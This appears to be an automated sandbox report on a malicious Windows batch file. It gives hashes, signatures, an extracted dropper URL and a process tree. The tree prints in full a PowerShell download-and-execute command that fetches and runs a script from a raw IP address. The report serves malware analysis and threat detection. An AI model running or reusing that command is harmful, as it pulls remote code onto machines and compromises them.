Analysis
Max time kernel: 145s
Max time network: 65s
Platform: windows10_x64
Resource: win10v200722
Submitted: 05-08-2020 09:10
Static task: static1

Behavioral task: behavioral1
  Sample: f63307d927f76a7440257534e6f8ce90.bat
  Resource: win7 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: f63307d927f76a7440257534e6f8ce90.bat
  Resource: win10v200722 (windows10_x64)
  0 signatures, 0 seconds
General
Target: f63307d927f76a7440257534e6f8ce90.bat
Size: 220B
MD5: 5cc2898f29e28db6519da57795c9e09b
SHA1: 415d75288386a5a534fecc039e479a8092f8cdfe
SHA256: 87cfbdd18095373e4e2674283270a2f829cb9d025556397ea5738eec62710ed2
SHA512: 6fc920fda753894ab4ae3c4856d867ee41ea1eb61fdad542fef8c0cd6358008386f6894138ee45775fa11d0581af76172e489faf0aef6fb6bfd30fade4a7a222
Score: 10/10
Malware Config
Extracted
  Language: ps1
  Source: ps1.dropper
  URLs: http://185.103.242.78/pastes/f63307d927f76a7440257534e6f8ce90
Signatures

Program crash (1 IoC)
  Processes:
    pid 584 WerFault.exe -> target pid 3952 powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    Token: SeRestorePrivilege  pid 584 WerFault.exe
    Token: SeBackupPrivilege   pid 584 WerFault.exe
    Token: SeDebugPrivilege    pid 584 WerFault.exe

Suspicious behavior: EnumeratesProcesses (13 IoCs)
  Processes:
    pid 584 WerFault.exe (13 events)

ServiceHost packer (5 IoCs)
  Detects ServiceHost packer used for .NET malware
  Processes (resource -> yara_rule):
    behavioral2/memory/3952-2-0x0000000000000000-mapping.dmp -> servicehost
    behavioral2/memory/3952-3-0x0000000000000000-mapping.dmp -> servicehost
    behavioral2/memory/3952-4-0x0000000000000000-mapping.dmp -> servicehost
    behavioral2/memory/3952-5-0x0000000000000000-mapping.dmp -> servicehost
    behavioral2/memory/3952-6-0x0000000000000000-mapping.dmp -> servicehost

Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
    PID 3956 cmd.exe wrote to memory of PID 3952 powershell.exe (3 events)
Processes

1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f63307d927f76a7440257534e6f8ce90.bat"
   PID: 3956
   Signatures: Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f63307d927f76a7440257534e6f8ce90');Invoke-JFFIICTTYZLYL;Start-Sleep -s 10000"
      PID: 3952

      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 700
         PID: 584
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses